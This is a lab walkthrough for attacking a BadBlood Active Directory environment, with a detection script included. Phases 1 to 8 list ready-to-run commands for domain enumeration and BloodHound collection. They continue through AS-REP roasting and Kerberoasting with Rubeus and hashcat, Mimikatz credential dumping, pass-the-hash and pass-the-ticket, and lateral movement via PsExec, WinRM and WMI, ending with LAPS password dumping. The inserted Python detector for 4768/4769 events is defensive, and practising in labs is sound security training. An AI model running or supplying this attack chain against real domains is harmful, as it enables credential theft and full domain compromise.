Realistic Active Directory Attack Lab Walkthrough: From Enumeration to Post-Exploitation
This hands-on guide is designed for your BadBlood AD lab and structured like a real-world AD attack path — from discovery to domain dominance. It’s meant to be practical, repeatable, and help you develop offensive intuition.
Phase 1: Enumeration – Users, Groups, and OUs
Goal: Identify users, groups, computers, and the layout of the domain.
```powershell
# List all domain users
Get-DomainUser | Select-Object cn

# Dump all domain groups
Get-DomainGroup | Select-Object name

# Get members of a high-value group
Get-DomainGroupMember -Identity "Domain Admins"

# Get user group memberships
Get-DomainUser -Identity <username> -Properties memberof

# List all Organizational Units
Get-DomainOU

# List users in a specific OU
Get-DomainUser -SearchBase "OU=Tier 2,DC=security,DC=local"

# List all computers
Get-DomainComputer
```
Phase 2: BloodHound Recon
Goal: Identify privilege paths, misconfigurations, and escalation routes.
```powershell
# Run collection from the victim machine
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp

# Or use SharpHound.exe
SharpHound.exe -c All
```
Next:
- Import the .zip into BloodHound.
- Explore:
  - Shortest path to domain admin
  - Kerberoastable users
  - Users with local admin rights
  - High-value targets and session overlap
Phase 3: Ticket-Based Attacks
AS-REP Roasting (no creds needed)
```powershell
# Find users without Kerberos pre-authentication
Get-DomainUser -PreauthNotRequired
```
Rubeus (write the hashes in hashcat format so mode 18200 accepts them):
```powershell
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
```
Crack with hashcat:
```bash
hashcat -m 18200 asrep_hashes.txt wordlist.txt
```
Kerberoasting (requires valid creds)
```powershell
# Find service accounts with SPNs
Get-DomainUser -SPN
```
Rubeus:
```powershell
.\Rubeus.exe kerberoast /format:hashcat /outfile:kerberoast_hashes.txt
```
Crack with hashcat:
```bash
hashcat -m 13100 kerberoast_hashes.txt wordlist.txt
```
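The blue-team counterpart to the two roasting techniques above, added here as an example and not part of the original lab guide: it scans Windows Security events 4768 (TGT request) and 4769 (service ticket request) and flags the classic indicators, RC4 (0x17) service-ticket encryption from one source and TGTs issued with pre-authentication type 0. The event records are constructed sample dicts keyed by the real event field names; the dict shape and the threshold of three distinct RC4 services are assumptions about your log pipeline.

```python
from collections import defaultdict

# Constructed sample events, one dict per record (field names as in the
# Windows Security log; the dict layout is an assumption about the pipeline).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice@SECURITY.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@SECURITY.LOCAL", "ServiceName": "httpsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@SECURITY.LOCAL", "ServiceName": "backupsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50", "Status": "0x0"},
    # Normal AES TGT renewal from another host: must not be flagged.
    {"EventID": 4769, "TargetUserName": "bob@SECURITY.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.51", "Status": "0x0"},
    # TGT issued with PreAuthType 0: the account has pre-auth disabled.
    {"EventID": 4768, "TargetUserName": "svc_legacy", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.50", "Status": "0x0"},
    # Ordinary pre-authenticated logon (PreAuthType 2 = PA-ENC-TIMESTAMP).
    {"EventID": 4768, "TargetUserName": "bob", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.51", "Status": "0x0"},
]

RC4_HMAC = "0x17"  # etype 23; modern domains should issue AES (0x11/0x12)


def find_kerberoast(events, threshold=3):
    """Return {source_ip: [service names]} for sources that received at least
    `threshold` distinct RC4-encrypted service tickets. krbtgt is excluded
    because a 4769 for krbtgt is a TGT renewal, not a service ticket."""
    per_src = defaultdict(set)
    for e in events:
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
                and e["Status"] == "0x0" and e["ServiceName"].lower() != "krbtgt"):
            per_src[e["IpAddress"]].add(e["ServiceName"])
    return {ip: sorted(s) for ip, s in per_src.items() if len(s) >= threshold}


def find_asrep_roast(events):
    """Return sorted (source_ip, user) pairs for TGTs issued without pre-auth,
    i.e. accounts exposed to AS-REP roasting that were actually requested."""
    hits = {(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["EventID"] == 4768 and e["PreAuthType"] == "0" and e["Status"] == "0x0"}
    return sorted(hits)


if __name__ == "__main__":
    print("Kerberoast suspects:", find_kerberoast(SAMPLE_EVENTS))
    print("AS-REP roast suspects:", find_asrep_roast(SAMPLE_EVENTS))
```

Tune the threshold to your environment; a single RC4 ticket for a legacy service is common, while a burst of them for every SPN in the domain from one host is the pattern the Rubeus command above produces.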
Phase 4: Privilege Escalation & Credential Dumping
Goal: Escalate from a limited user to SYSTEM or find reusable credentials (passwords, hashes, tickets).
PowerUp
```powershell
Invoke-AllChecks
```
Mimikatz
```text
privilege::debug
log
sekurlsa::logonpasswords
```
Phase 5: Credential Abuse
Pass-the-Hash (PTH)
```text
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:cmd.exe
```
Pass-the-Ticket (PTT)
```text
kerberos::list
kerberos::ptt <ticket.kirbi>
```
Use these techniques when you have NTLM hashes or .kirbi tickets and want to authenticate without knowing the actual password.
Phase 6: Lateral Movement
PsExec (SMB)
```cmd
PsExec.exe \\target cmd.exe
```
PowerShell Remoting (WinRM)
```powershell
Enter-PSSession -ComputerName target -Credential $cred
```
WMI Execution
```powershell
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe" -ComputerName target
```
RDP
Use mstsc.exe or xfreerdp with stolen credentials if RDP is enabled.
Phase 7: Post-Exploitation & Pivoting
```powershell
# Re-run BloodHound from the newly compromised machine
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp

# Enumerate sessions and local groups
Get-NetSession -ComputerName target
Get-NetLocalGroup -ComputerName target
```
- Search for scheduled tasks, startup scripts, and GPP credentials.
- Use the new access to gather more credentials and reach new systems.
Phase 8: Optional Techniques & Exploration
LAPS Password Dumping
```powershell
Find-LapsPasswords
```
Unquoted Service Path Discovery
```powershell
Get-WmiObject win32_service | Where { $_.PathName -like '* *' -and $_.PathName -notlike '"*"' }
```
GPO Enumeration
```powershell
Get-DomainGPO
Get-DomainGPOLocalGroup
```
ACL Abuse
```powershell
Find-InterestingDomainAcl
```
What to Do Next
- Rerun this playbook with different entry points (e.g., compromised service account).
- Try building BloodHound graphs from multiple hops.
- Practice chaining attacks: roasting → cracking → privesc → lateral movement → dump → pass → pwn.
